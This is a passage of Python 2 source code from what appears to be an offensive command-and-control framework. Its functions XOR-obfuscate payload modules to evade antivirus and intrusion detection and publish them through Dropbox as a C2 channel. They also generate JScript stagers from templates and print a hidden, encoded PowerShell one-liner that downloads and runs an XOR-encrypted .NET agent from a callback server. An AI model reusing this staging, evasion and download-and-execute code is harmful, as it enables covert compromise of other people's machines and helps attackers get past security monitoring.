def publishModule(self, moduleLocalPath, moduleName):
print helpers.color(
"[*] Publishing [{}] to the C2 server".format(moduleLocalPath))
remoteFilePath = "/" + moduleName + ".mm"
# Get a SHA256 hash value of the master key
# (!!) : Because we use XOR for obfuscating the stage (not proper encryption, just for IDS / AV evasion),
# it would not be wise to use the master key that is also used for end-to-end data encryption
xorKey = Crypto.convertKey(self.statusHandler.masterKey,
outputFormat="sha256")
# XOR Encrypt the module and then upload it to the C2 server
try:
with open(moduleLocalPath) as moduleFileHandle:
r = self.dropboxHandler.putFile(
remoteFilePath,
Crypto.xor(bytearray(moduleFileHandle.read()), xorKey))
moduleFileHandle.close()
if r is None:
return
else:
print helpers.color(
"[*] Module XOR encrypted with key [{}] and successfully published"
.format(xorKey))
except IOError:
print helpers.color(
"[!] Could not open or read file [{}]".format(moduleLocalPath))
return
# Share the file with a public URL and retrieve the URL
r = self.dropboxHandler.shareFile(remoteFilePath)
if r is None:
return
# Get the public URL from the answer
try:
moduleURL = r['url'].replace("dl=0", "dl=1")
self.statusHandler.addModule(moduleName, moduleURL)
print helpers.color(
"[*] Module successfully shared with public URL [{}]".format(
moduleURL))
except KeyError:
print helpers.color(
"[!] Error parsing JSON looking for 'url' entry")
print helpers.color(
"[!] Stage has NOT been shared as a public URL")
def do_genStager(self, args):
"""genStager <jscript1|jscript2|jscript3>\nGenerates a stager of the selected type"""
# Checking args
if not args:
print helpers.color("[!] Missing arguments. Command format: genStager <stager_name>")
return
# Retrieve the type of stager to generate
stagerType = args.split()[0]
# Check it is a supported type of stager
if stagerType not in ['jscript1', 'jscript2', 'jscript3', 'psoneliner']:
print helpers.color("[!] Invalid stager type")
return
# Common parameters for stager generation
params = {'callbackURL': config.CALLBACK, 'port': config.PORT, 'prefix': config.IDPREFIX}
#---- Generate stager jscript1
if stagerType == 'jscript1':
stager = helpers.convertFromTemplate(params, 'templates/wsc2Agent1_js.tpl')
stagerFileName = config.STAGERFILES + '/wsc2Agent1.js'
try:
with open(stagerFileName, 'w+') as fileHandle:
fileHandle.write(stager)
fileHandle.close()
print helpers.color("[+] Stager created as [{}]".format(stagerFileName))
except IOError:
print helpers.color("[!] Could not create stager file [{}]".format(stagerFileName))
#---- Generate stager jscript2
elif stagerType == 'jscript2':
stager = helpers.convertFromTemplate(params, 'templates/wsc2Agent2_js.tpl')
stagerFileName = config.STAGERFILES + '/wsc2Agent2.js'
try:
with open(stagerFileName, 'w+') as fileHandle:
fileHandle.write(stager)
fileHandle.close()
print helpers.color("[+] Stager created as [{}]".format(stagerFileName))
except IOError:
print helpers.color("[!] Could not create stager file [{}]".format(stagerFileName))
#---- Generate stager jscript3
elif stagerType == 'jscript3':
stager2 = helpers.convertFromTemplate(params, 'templates/wsc2Agent2_js.tpl')
stager2Encoded = helpers.b64encode(stager2)
stager = helpers.convertFromTemplate({'encoded': stager2Encoded}, 'templates/wsc2Agent3_js.tpl')
stagerFileName = config.STAGERFILES + '/wsc2Agent3.js'
try:
with open(stagerFileName, 'w+') as fileHandle:
fileHandle.write(stager)
fileHandle.close()
print helpers.color("[+] Stager created as [{}]".format(stagerFileName))
except IOError:
print helpers.color("[!] Could not create stager file [{}]".format(stagerFileName))
#---- Generate stager psoneliner
elif stagerType == 'psoneliner':
# Get bytes from the .Net assembly WSC2 agent
try:
with open(config.AGENTRELEASE) as fileHandle:
agentBytes = bytearray(fileHandle.read())
fileHandle.close()
except IOError:
print helpers.color("[!] Could not read agent release file [{}]".format(config.AGENTRELEASE))
# We'll simply use the sha256 hash of the password as the XOR encryption key
xorKey = Crypto.convertKey(config.XORPASSWORD, outputFormat = "sha256")
# Write the XOR encrypted agent file in the web static delivery folder
try:
with open(config.STATICFILES+'/'+'agent.txt' , 'w+') as fileHandle:
fileHandle.write(Crypto.xor(agentBytes, xorKey))
fileHandle.close()
except IOError:
print helpers.color("[!] Could not write xor encrypted agent file [{}]".format(config.STATICFILES+'/'+'agent.txt'))
return
params['xorKey'] = xorKey
posh = helpers.convertFromTemplate(params, 'templates/posh.tpl')
print helpers.color("[+] Powershell one liner:")
print "powershell.exe -NoP -sta -NonI -W Hidden -e {}".format(helpers.powershellEncode(posh))
